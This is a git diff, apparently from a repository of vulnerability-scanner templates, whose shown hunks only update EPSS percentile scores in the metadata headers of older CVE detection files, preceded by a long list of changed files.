http/cves/2023/CVE-2023-37580.yaml | 4 ++-- http/cves/2023/CVE-2023-37629.yaml | 2 +- http/cves/2023/CVE-2023-3765.yaml | 4 ++-- http/cves/2023/CVE-2023-37679.yaml | 2 +- http/cves/2023/CVE-2023-37979.yaml | 2 +- http/cves/2023/CVE-2023-38205.yaml | 2 +- http/cves/2023/CVE-2023-3836.yaml | 2 +- http/cves/2023/CVE-2023-3843.yaml | 2 +- http/cves/2023/CVE-2023-38433.yaml | 2 +- http/cves/2023/CVE-2023-3844.yaml | 2 +- http/cves/2023/CVE-2023-3845.yaml | 2 +- http/cves/2023/CVE-2023-3846.yaml | 2 +- http/cves/2023/CVE-2023-3847.yaml | 2 +- http/cves/2023/CVE-2023-3848.yaml | 2 +- http/cves/2023/CVE-2023-3849.yaml | 2 +- http/cves/2023/CVE-2023-38501.yaml | 2 +- http/cves/2023/CVE-2023-38646.yaml | 2 +- http/cves/2023/CVE-2023-39026.yaml | 2 +- http/cves/2023/CVE-2023-39108.yaml | 2 +- http/cves/2023/CVE-2023-39109.yaml | 2 +- http/cves/2023/CVE-2023-39110.yaml | 2 +- http/cves/2023/CVE-2023-39141.yaml | 2 +- http/cves/2023/CVE-2023-39143.yaml | 2 +- http/cves/2023/CVE-2023-3936.yaml | 2 +- http/cves/2023/CVE-2023-39361.yaml | 2 +- http/cves/2023/CVE-2023-39598.yaml | 2 +- http/cves/2023/CVE-2023-39600.yaml | 2 +- http/cves/2023/CVE-2023-39676.yaml | 2 +- http/cves/2023/CVE-2023-39677.yaml | 2 +- http/cves/2023/CVE-2023-39700.yaml | 2 +- http/cves/2023/CVE-2023-40208.yaml | 2 +- http/cves/2023/CVE-2023-40779.yaml | 2 +- http/cves/2023/CVE-2023-4110.yaml | 2 +- http/cves/2023/CVE-2023-4111.yaml | 2 +- http/cves/2023/CVE-2023-4112.yaml | 2 +- http/cves/2023/CVE-2023-4113.yaml | 2 +- http/cves/2023/CVE-2023-4114.yaml | 2 +- http/cves/2023/CVE-2023-4115.yaml | 2 +- http/cves/2023/CVE-2023-4116.yaml | 2 +- http/cves/2023/CVE-2023-4148.yaml | 2 +- http/cves/2023/CVE-2023-41538.yaml | 2 +- http/cves/2023/CVE-2023-41642.yaml | 4 ++-- http/cves/2023/CVE-2023-4168.yaml | 2 +- http/cves/2023/CVE-2023-4169.yaml | 4 ++-- http/cves/2023/CVE-2023-4173.yaml | 2 +- http/cves/2023/CVE-2023-4174.yaml | 2 +- http/cves/2023/CVE-2023-41892.yaml | 2 +- http/cves/2023/CVE-2023-42442.yaml | 2 +- http/cves/2023/CVE-2023-43261.yaml | 2 +- http/cves/2023/CVE-2023-43795.yaml | 7 ++++--- http/cves/2023/CVE-2023-4415.yaml | 2 +- http/cves/2023/CVE-2023-4451.yaml | 2 +- http/cves/2023/CVE-2023-4547.yaml | 2 +- http/cves/2023/CVE-2023-4568.yaml | 2 +- http/cves/2023/CVE-2023-45852.yaml | 2 +- http/cves/2023/CVE-2023-4634.yaml | 2 +- http/cves/2023/CVE-2023-46747.yaml | 2 +- http/cves/2023/CVE-2023-4714.yaml | 2 +- http/cves/2023/CVE-2023-4966.yaml | 2 +- http/cves/2023/CVE-2023-4974.yaml | 2 +- http/cves/2023/CVE-2023-5074.yaml | 2 +- http/cves/2023/CVE-2023-5244.yaml | 2 +- http/cves/2023/CVE-2023-5360.yaml | 2 +- .../installer/ruckus-smartzone-install.yaml | 3 ++- .../installer/ruckus-unleashed-install.yaml | 3 ++- .../wordpress/plugins/ad-inserter.yaml | 5 +++-- .../wordpress/plugins/add-to-any.yaml | 5 +++-- .../wordpress/plugins/admin-menu-editor.yaml | 5 +++-- .../plugins/advanced-custom-fields.yaml | 5 +++-- http/technologies/wordpress/plugins/akismet.yaml | 5 +++-- .../plugins/all-404-redirect-to-homepage.yaml | 5 +++-- .../wordpress/plugins/all-in-one-seo-pack.yaml | 5 +++-- .../plugins/all-in-one-wp-migration.yaml | 5 +++-- .../all-in-one-wp-security-and-firewall.yaml | 5 +++-- http/technologies/wordpress/plugins/amp.yaml | 5 +++-- .../wordpress/plugins/antispam-bee.yaml | 5 +++-- .../wordpress/plugins/astra-sites.yaml | 5 +++-- .../wordpress/plugins/astra-widgets.yaml | 5 +++-- .../wordpress/plugins/autoptimize.yaml | 5 +++-- .../technologies/wordpress/plugins/backwpup.yaml | 5 +++-- .../wordpress/plugins/better-search-replace.yaml | 5 +++-- .../wordpress/plugins/better-wp-security.yaml | 5 +++-- .../plugins/black-studio-tinymce-widget.yaml | 5 +++-- .../wordpress/plugins/breadcrumb-navxt.yaml | 5 +++-- http/technologies/wordpress/plugins/breeze.yaml | 5 +++-- .../wordpress/plugins/broken-link-checker.yaml | 5 +++-- .../plugins/child-theme-configurator.yaml | 5 +++-- .../wordpress/plugins/classic-editor.yaml | 5 +++-- .../wordpress/plugins/classic-widgets.yaml | 5 +++-- .../plugins/click-to-chat-for-whatsapp.yaml | 5 +++-- http/technologies/wordpress/plugins/cmb2.yaml | 5 +++-- .../technologies/wordpress/plugins/coblocks.yaml | 5 +++-- .../wordpress/plugins/code-snippets.yaml | 5 +++-- .../wordpress/plugins/coming-soon.yaml | 5 +++-- .../wordpress/plugins/complianz-gdpr.yaml | 5 +++-- .../plugins/contact-form-7-honeypot.yaml | 5 +++-- .../wordpress/plugins/contact-form-7.yaml | 5 +++-- .../wordpress/plugins/contact-form-cfdb7.yaml | 5 +++-- .../wordpress/plugins/cookie-law-info.yaml | 5 +++-- .../wordpress/plugins/cookie-notice.yaml | 5 +++-- .../wordpress/plugins/creame-whatsapp-me.yaml | 5 +++-- .../creative-mail-by-constant-contact.yaml | 5 +++-- .../wordpress/plugins/custom-css-js.yaml | 5 +++-- .../wordpress/plugins/custom-fonts.yaml | 5 +++-- .../wordpress/plugins/custom-post-type-ui.yaml | 5 +++-- .../wordpress/plugins/disable-comments.yaml | 5 +++-- .../wordpress/plugins/disable-gutenberg.yaml | 5 +++-- .../wordpress/plugins/duplicate-page.yaml | 5 +++-- .../wordpress/plugins/duplicate-post.yaml | 5 +++-- .../wordpress/plugins/duplicator.yaml | 5 +++-- .../plugins/duracelltomi-google-tag-manager.yaml | 5 +++-- .../wordpress/plugins/easy-fancybox.yaml | 5 +++-- .../plugins/easy-table-of-contents.yaml | 5 +++-- .../wordpress/plugins/easy-wp-smtp.yaml | 5 +++-- .../wordpress/plugins/elementor.yaml | 5 +++-- .../wordpress/plugins/elementskit-lite.yaml | 5 +++-- .../wordpress/plugins/enable-media-replace.yaml | 5 +++-- .../wordpress/plugins/envato-elements.yaml | 5 +++-- .../essential-addons-for-elementor-lite.yaml | 5 +++-- .../wordpress/plugins/ewww-image-optimizer.yaml | 5 +++-- .../plugins/facebook-for-woocommerce.yaml | 5 +++-- .../wordpress/plugins/fast-indexing-api.yaml | 5 +++-- .../plugins/favicon-by-realfavicongenerator.yaml | 5 +++-- .../technologies/wordpress/plugins/flamingo.yaml | 5 +++-- .../wordpress/plugins/fluentform.yaml | 5 +++-- .../wordpress/plugins/font-awesome.yaml | 5 +++-- .../plugins/force-regenerate-thumbnails.yaml | 5 +++-- .../wordpress/plugins/formidable.yaml | 5 +++-- .../wordpress/plugins/forminator.yaml | 5 +++-- .../wordpress/plugins/ga-google-analytics.yaml | 5 +++-- .../plugins/gdpr-cookie-compliance.yaml | 5 +++-- .../google-analytics-dashboard-for-wp.yaml | 5 +++-- .../plugins/google-analytics-for-wordpress.yaml | 5 +++-- .../plugins/google-listings-and-ads.yaml | 5 +++-- .../wordpress/plugins/google-site-kit.yaml | 5 +++-- .../plugins/google-sitemap-generator.yaml | 5 +++-- .../wordpress/plugins/gtranslate.yaml | 5 +++-- .../wordpress/plugins/gutenberg.yaml | 5 +++-- .../plugins/happy-elementor-addons.yaml | 5 +++-- .../plugins/header-footer-code-manager.yaml | 5 +++-- .../plugins/header-footer-elementor.yaml | 5 +++-- .../wordpress/plugins/header-footer.yaml | 5 +++-- .../wordpress/plugins/health-check.yaml | 5 +++-- .../wordpress/plugins/hello-dolly.yaml | 5 +++-- .../wordpress/plugins/host-webfonts-local.yaml | 5 +++-- http/technologies/wordpress/plugins/imagify.yaml | 5 +++-- .../technologies/wordpress/plugins/imsanity.yaml | 5 +++-- .../plugins/insert-headers-and-footers.yaml | 5 +++-- .../wordpress/plugins/instagram-feed.yaml | 5 +++-- .../plugins/intuitive-custom-post-order.yaml | 5 +++-- .../wordpress/plugins/iwp-client.yaml | 5 +++-- .../wordpress/plugins/jetpack-boost.yaml | 5 +++-- http/technologies/wordpress/plugins/jetpack.yaml | 5 +++-- .../wordpress/plugins/kadence-blocks.yaml | 5 +++-- http/technologies/wordpress/plugins/kirki.yaml | 5 +++-- http/technologies/wordpress/plugins/leadin.yaml | 5 +++-- .../plugins/limit-login-attempts-reloaded.yaml | 5 +++-- .../wordpress/plugins/limit-login-attempts.yaml | 5 +++-- .../wordpress/plugins/litespeed-cache.yaml | 5 +++-- .../wordpress/plugins/loco-translate.yaml | 5 +++-- .../wordpress/plugins/loginizer.yaml | 5 +++-- .../plugins/mailchimp-for-woocommerce.yaml | 5 +++-- .../wordpress/plugins/mailchimp-for-wp.yaml | 5 +++-- .../technologies/wordpress/plugins/mailpoet.yaml | 5 +++-- .../wordpress/plugins/maintenance.yaml | 5 +++-- .../wordpress/plugins/mainwp-child.yaml | 5 +++-- .../wordpress/plugins/malcare-security.yaml | 5 +++-- .../technologies/wordpress/plugins/megamenu.yaml | 5 +++-- http/technologies/wordpress/plugins/members.yaml | 5 +++-- .../technologies/wordpress/plugins/meta-box.yaml | 5 +++-- http/technologies/wordpress/plugins/metform.yaml | 5 +++-- .../wordpress/plugins/ml-slider.yaml | 5 +++-- .../wordpress/plugins/newsletter.yaml | 5 +++-- .../plugins/nextend-facebook-connect.yaml | 5 +++-- .../wordpress/plugins/nextgen-gallery.yaml | 5 +++-- .../wordpress/plugins/ninja-forms.yaml | 5 +++-- .../wordpress/plugins/ocean-extra.yaml | 5 +++-- .../plugins/official-facebook-pixel.yaml | 5 +++-- .../wordpress/plugins/one-click-demo-import.yaml | 5 +++-- .../wordpress/plugins/optinmonster.yaml | 5 +++-- .../wordpress/plugins/otter-blocks.yaml | 5 +++-- .../wordpress/plugins/password-protected.yaml | 5 +++-- .../wordpress/plugins/pdf-embedder.yaml | 5 +++-- .../plugins/pinterest-for-woocommerce.yaml | 5 +++-- .../wordpress/plugins/pixelyoursite.yaml | 5 +++-- .../technologies/wordpress/plugins/polylang.yaml | 5 +++-- .../wordpress/plugins/popup-builder.yaml | 5 +++-- .../wordpress/plugins/popup-maker.yaml | 5 +++-- .../wordpress/plugins/post-smtp.yaml | 5 +++-- .../wordpress/plugins/post-types-order.yaml | 5 +++-- .../plugins/premium-addons-for-elementor.yaml | 5 +++-- .../wordpress/plugins/pretty-link.yaml | 5 +++-- .../wordpress/plugins/really-simple-captcha.yaml | 5 +++-- .../wordpress/plugins/really-simple-ssl.yaml | 5 +++-- .../wordpress/plugins/redirection.yaml | 5 +++-- .../wordpress/plugins/redux-framework.yaml | 5 +++-- .../wordpress/plugins/regenerate-thumbnails.yaml | 5 +++-- .../technologies/wordpress/plugins/safe-svg.yaml | 5 +++-- .../wordpress/plugins/seo-by-rank-math.yaml | 5 +++-- .../wordpress/plugins/sg-cachepress.yaml | 5 +++-- .../wordpress/plugins/sg-security.yaml | 5 +++-- .../wordpress/plugins/shortcodes-ultimate.yaml | 5 +++-- .../plugins/shortpixel-image-optimiser.yaml | 5 +++-- .../plugins/simple-custom-post-order.yaml | 5 +++-- .../wordpress/plugins/siteguard.yaml | 5 +++-- .../wordpress/plugins/siteorigin-panels.yaml | 5 +++-- .../wordpress/plugins/smart-slider-3.yaml | 5 +++-- .../wordpress/plugins/so-widgets-bundle.yaml | 5 +++-- .../stops-core-theme-and-plugin-updates.yaml | 5 +++-- .../wordpress/plugins/sucuri-scanner.yaml | 5 +++-- .../wordpress/plugins/svg-support.yaml | 5 +++-- .../plugins/table-of-contents-plus.yaml | 5 +++-- .../wordpress/plugins/tablepress.yaml | 5 +++-- .../wordpress/plugins/taxonomy-terms-order.yaml | 5 +++-- .../wordpress/plugins/the-events-calendar.yaml | 5 +++-- .../wordpress/plugins/tinymce-advanced.yaml | 5 +++-- .../plugins/translatepress-multilingual.yaml | 5 +++-- .../plugins/ultimate-addons-for-gutenberg.yaml | 5 +++-- .../plugins/under-construction-page.yaml | 5 +++-- .../wordpress/plugins/updraftplus.yaml | 5 +++-- .../wordpress/plugins/use-any-font.yaml | 5 +++-- .../wordpress/plugins/user-role-editor.yaml | 5 +++-- .../plugins/velvet-blues-update-urls.yaml | 5 +++-- .../wordpress/plugins/w3-total-cache.yaml | 5 +++-- .../plugins/webp-converter-for-media.yaml | 5 +++-- .../wordpress/plugins/webp-express.yaml | 5 +++-- .../plugins/widget-importer-exporter.yaml | 5 +++-- .../plugins/woo-cart-abandonment-recovery.yaml | 5 +++-- .../plugins/woo-checkout-field-editor-pro.yaml | 5 +++-- .../plugins/woo-variation-swatches.yaml | 5 +++-- ...commerce-gateway-paypal-express-checkout.yaml | 5 +++-- .../plugins/woocommerce-gateway-stripe.yaml | 5 +++-- .../wordpress/plugins/woocommerce-payments.yaml | 5 +++-- .../plugins/woocommerce-paypal-payments.yaml | 5 +++-- .../woocommerce-pdf-invoices-packing-slips.yaml | 5 +++-- .../wordpress/plugins/woocommerce-services.yaml | 5 +++-- .../wordpress/plugins/woocommerce.yaml | 5 +++-- .../wordpress/plugins/wordfence.yaml | 5 +++-- .../wordpress/plugins/wordpress-importer.yaml | 5 +++-- .../wordpress/plugins/wordpress-seo.yaml | 5 +++-- http/technologies/wordpress/plugins/worker.yaml | 5 +++-- .../wordpress/plugins/wp-fastest-cache.yaml | 5 +++-- .../wordpress/plugins/wp-file-manager.yaml | 5 +++-- .../wordpress/plugins/wp-google-maps.yaml | 5 +++-- .../wordpress/plugins/wp-mail-smtp.yaml | 5 +++-- .../wordpress/plugins/wp-maintenance-mode.yaml | 5 +++-- .../wordpress/plugins/wp-migrate-db.yaml | 5 +++-- .../wordpress/plugins/wp-multibyte-patch.yaml | 5 +++-- .../wordpress/plugins/wp-optimize.yaml | 5 +++-- .../wordpress/plugins/wp-pagenavi.yaml | 5 +++-- .../technologies/wordpress/plugins/wp-reset.yaml | 5 +++-- .../plugins/wp-reviews-plugin-for-google.yaml | 5 +++-- .../wordpress/plugins/wp-rollback.yaml | 5 +++-- .../wordpress/plugins/wp-seopress.yaml | 5 +++-- .../wordpress/plugins/wp-sitemap-page.yaml | 5 +++-- .../wordpress/plugins/wp-smushit.yaml | 5 +++-- .../wordpress/plugins/wp-statistics.yaml | 5 +++-- .../wordpress/plugins/wp-super-cache.yaml | 5 +++-- .../wordpress/plugins/wp-user-avatar.yaml | 5 +++-- .../wordpress/plugins/wpcf7-recaptcha.yaml | 5 +++-- .../wordpress/plugins/wpcf7-redirect.yaml | 5 +++-- .../wordpress/plugins/wpforms-lite.yaml | 5 +++-- .../wordpress/plugins/wps-hide-login.yaml | 5 +++-- .../wordpress/plugins/wpvivid-backuprestore.yaml | 5 +++-- .../plugins/yith-woocommerce-wishlist.yaml | 5 +++-- .../apache/apache-druid-kafka-connect-rce.yaml | 2 +- network/cves/2022/CVE-2022-31793.yaml | 2 +- 2165 files changed, 2682 insertions(+), 2447 deletions(-) diff --git a/http/cves/2000/CVE-2000-0114.yaml b/http/cves/2000/CVE-2000-0114.yaml index 4b8938e983..183edd8d83 100644 --- a/http/cves/2000/CVE-2000-0114.yaml +++ b/http/cves/2000/CVE-2000-0114.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2000-0114 cwe-id: NVD-CWE-Other epss-score: 0.09258 - epss-percentile: 0.94019 + epss-percentile: 0.94023 cpe: cpe:2.3:a:microsoft:internet_information_server:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2001/CVE-2001-0537.yaml b/http/cves/2001/CVE-2001-0537.yaml index fe0ac87542..2ad4c99dc5 100644 --- a/http/cves/2001/CVE-2001-0537.yaml +++ b/http/cves/2001/CVE-2001-0537.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2001-0537 cwe-id: CWE-287 epss-score: 0.88063 - epss-percentile: 0.98328 + epss-percentile: 0.9833 cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2002/CVE-2002-1131.yaml b/http/cves/2002/CVE-2002-1131.yaml index 3b437e62d6..8e0b9ab9b5 100644 --- a/http/cves/2002/CVE-2002-1131.yaml +++ b/http/cves/2002/CVE-2002-1131.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2002-1131 cwe-id: CWE-80 epss-score: 0.06018 - epss-percentile: 0.92666 + epss-percentile: 0.92673 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2004/CVE-2004-0519.yaml b/http/cves/2004/CVE-2004-0519.yaml index 676178c987..ffd72068b8 100644 --- a/http/cves/2004/CVE-2004-0519.yaml +++ b/http/cves/2004/CVE-2004-0519.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2004-0519 cwe-id: NVD-CWE-Other epss-score: 0.02285 - epss-percentile: 0.88457 + epss-percentile: 0.88461 cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2004/CVE-2004-1965.yaml b/http/cves/2004/CVE-2004-1965.yaml index cc8bc28080..fe531f4f0e 100644 --- a/http/cves/2004/CVE-2004-1965.yaml +++ b/http/cves/2004/CVE-2004-1965.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2004-1965 cwe-id: NVD-CWE-Other epss-score: 0.0113 - epss-percentile: 0.83076 + epss-percentile: 0.83087 cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-2428.yaml b/http/cves/2005/CVE-2005-2428.yaml index 9f0796b9ee..81c4ba2ee1 100644 --- a/http/cves/2005/CVE-2005-2428.yaml +++ b/http/cves/2005/CVE-2005-2428.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2005-2428 cwe-id: CWE-200 epss-score: 0.01188 - epss-percentile: 0.83571 + epss-percentile: 0.8358 cpe: cpe:2.3:a:ibm:lotus_domino:5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-3344.yaml b/http/cves/2005/CVE-2005-3344.yaml index a259c82d93..f7ab51de6f 100644 --- a/http/cves/2005/CVE-2005-3344.yaml +++ b/http/cves/2005/CVE-2005-3344.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2005-3344 cwe-id: NVD-CWE-Other epss-score: 0.02158 - epss-percentile: 0.88101 + epss-percentile: 0.88106 cpe: cpe:2.3:a:horde:horde:3.0.4:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index 3618383071..a351ba91bf 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2005-3634 cwe-id: NVD-CWE-Other epss-score: 0.02843 - epss-percentile: 0.89574 + epss-percentile: 0.8958 cpe: cpe:2.3:a:sap:sap_web_application_server:6.10:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index 21238666e0..eacc34cfed 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2005-4385 cwe-id: NVD-CWE-Other epss-score: 0.00294 - epss-percentile: 0.65814 + epss-percentile: 0.6585 cpe: cpe:2.3:a:cofax:cofax:1.9.9c:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 466c225ade..67bccf5004 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2006-1681 cwe-id: NVD-CWE-Other epss-score: 0.01015 - epss-percentile: 0.821 + epss-percentile: 0.82109 cpe: cpe:2.3:a:cherokee:cherokee_httpd:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index 7b19219032..558041af92 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2006-2842 cwe-id: CWE-22 epss-score: 0.22361 - epss-percentile: 0.95949 + epss-percentile: 0.95952 cpe: cpe:2.3:a:squirrelmail:squirrelmail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-0885.yaml b/http/cves/2007/CVE-2007-0885.yaml index 461ad74ddd..e4862f3957 100644 --- a/http/cves/2007/CVE-2007-0885.yaml +++ b/http/cves/2007/CVE-2007-0885.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other epss-score: 0.0059 - epss-percentile: 0.75886 + epss-percentile: 0.75909 cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index 962296c5bd..7b4745028c 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2007-4504 cwe-id: CWE-22 epss-score: 0.01677 - epss-percentile: 0.86281 + epss-percentile: 0.86285 cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 19130aa520..54d844b64a 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other epss-score: 0.19583 - epss-percentile: 0.95732 + epss-percentile: 0.95735 cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 122f9901d5..9c31156d15 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2007-5728 cwe-id: CWE-79 epss-score: 0.02361 - epss-percentile: 0.88625 + epss-percentile: 0.8863 cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 2dda919de8..ae8abb9512 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1059 cwe-id: CWE-94 epss-score: 0.01493 - epss-percentile: 0.85416 + epss-percentile: 0.85423 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 342384b278..388a55f55b 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-1061 cwe-id: CWE-79 epss-score: 0.00938 - epss-percentile: 0.81344 + epss-percentile: 0.81358 cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index fe76f518b9..6f1772485d 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-1547 cwe-id: CWE-601 epss-score: 0.03523 - epss-percentile: 0.90498 + epss-percentile: 0.90505 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index a2ac2885e9..6e3db77e34 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-2398 cwe-id: CWE-79 epss-score: 0.00329 - epss-percentile: 0.67767 + epss-percentile: 0.67792 cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 39cf5832e8..14c6ec5326 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2008-2650 cwe-id: CWE-22 epss-score: 0.06344 - epss-percentile: 0.92856 + epss-percentile: 0.9286 cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 76cfbccde6..4335cd9e04 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-4668 cwe-id: CWE-22 epss-score: 0.01018 - epss-percentile: 0.8212 + epss-percentile: 0.8213 cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 1d8b612e72..10fe7f6c2f 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-4764 cwe-id: CWE-22 epss-score: 0.02365 - epss-percentile: 0.88632 + epss-percentile: 0.88638 cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 102d47928d..b8189323fc 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-5587 cwe-id: CWE-22 epss-score: 0.02331 - epss-percentile: 0.88553 + epss-percentile: 0.88557 cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index c846db5393..29fbd71ae2 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6080 cwe-id: CWE-22 epss-score: 0.00824 - epss-percentile: 0.8003 + epss-percentile: 0.80042 cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index bfbbae8a17..e9763c88d8 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6172 cwe-id: CWE-22 epss-score: 0.00509 - epss-percentile: 0.73923 + epss-percentile: 0.7395 cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 81e00d8b27..32977437d5 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2008-6222 cwe-id: CWE-22 epss-score: 0.01029 - epss-percentile: 0.82197 + epss-percentile: 0.82206 cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 30a1c0a3d9..73acdbff09 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2008-6465 cwe-id: CWE-79 epss-score: 0.00421 - epss-percentile: 0.71388 + epss-percentile: 0.71413 cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 9193c2b437..14a7d6c0c5 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2008-6668 cwe-id: CWE-22 epss-score: 0.00359 - epss-percentile: 0.6908 + epss-percentile: 0.69107 cpe: 